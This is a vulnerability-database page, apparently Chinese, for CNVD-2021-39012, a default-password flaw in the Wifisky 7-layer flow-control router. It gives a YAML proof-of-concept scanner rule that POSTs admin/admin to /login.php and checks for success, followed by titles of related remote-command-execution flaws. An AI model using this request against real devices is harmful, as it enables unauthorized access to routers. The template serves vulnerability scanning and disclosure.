CNVD-2021-39012: Wifisky Default Password

漏洞描述

PoC代码[已公开]

id: CNVD-2021-39012

info:
  name: Wifisky Default Password
  author: Print1n
  severity: high
  verified: false
  description: |-
    app="WIFISKY-7层流控路由器"
  reference:
    - https://securityforeveryone.com/tools/wifisky-default-password-scanner
  tags: cnvd,cnvd2021,default-login
  created: 2021/10/23

rules:
  r0:
    request:
      method: POST
      path: /login.php?action=login&type=admin
      body: username=admin&password=admin
    expression: response.status == 200 && response.headers["content-type"].contains("text/html") && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":')
expression: r0()

相关漏洞推荐

• POC wifisky-default-login: Wifisky Default Login
• POC wifisky7-rce: WIFISKY-7 Layer Flow Control Router - Remote Code Execution
• 领空技术WIFISKY7层流控路由器 /login.php 默认口令漏洞
• WIFISKY-7层流控路由器 index.php 远程命令执行漏洞
• 领空技术 WIFISKY 7层流控路由器 /notice/confirm.php 远程命令执行漏洞
• WIFISKY-流控路由器 jumper.php 命令执行漏洞
• 领空技术WIFISKY 7层流控路由器弱口令漏洞
• WIFISKY-7层流控路由器（碧海威 L7多款产品） /portal/ibilling/index.php 远程命令执行漏洞
• WIFISKY-7层流控路由器（碧海威 L7多款产品） 弱口令后台任意命令执行漏洞